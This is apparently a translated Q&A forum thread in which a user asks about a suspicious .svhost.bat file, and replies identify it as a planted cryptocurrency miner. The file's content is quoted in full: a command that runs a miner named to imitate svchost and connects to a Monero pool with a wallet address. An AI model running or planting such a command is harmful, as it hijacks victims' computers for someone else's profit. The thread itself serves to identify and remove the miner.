我刚刚找到了名为.svhost.bat的.bat文件。该文件包含以下内容:
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
这是病毒(窃取信息等)还是种植的矿工?我很担心,因为我也涉猎加密货币,并且stratum是上面文件中提到的一种货币。
1
这确实是矿工。考虑到您自己使用加密货币,如果您也进行挖矿,请确保这实际上不是您用来挖矿的任何部分。您可以通过将.bat扩展名重命名为其他名称来执行此操作,然后查看重新启动后是否仍能正常进行挖掘。我对此文件感到奇怪的是,鉴于scvhost既是文件执行名称又是bat文件,通常它会自行调用。通常,这将导致循环。
—
LPChip
@VirtualAnomaly我认为您误认为sVChost与此处提到的sCVhost。是的,我非常清楚svchost是托管服务的机制。
—
LPChip
@LPChip我很抱歉,您是对的,我误会了。
—
虚拟异常
我猜有人玩了太多《星际争霸》。
—
CodesInChaos
@lucidbrot SCV是游戏其中一场比赛(地形)的“生成器”单元,在这种情况下,其代表“太空建造车”。
—
亚伦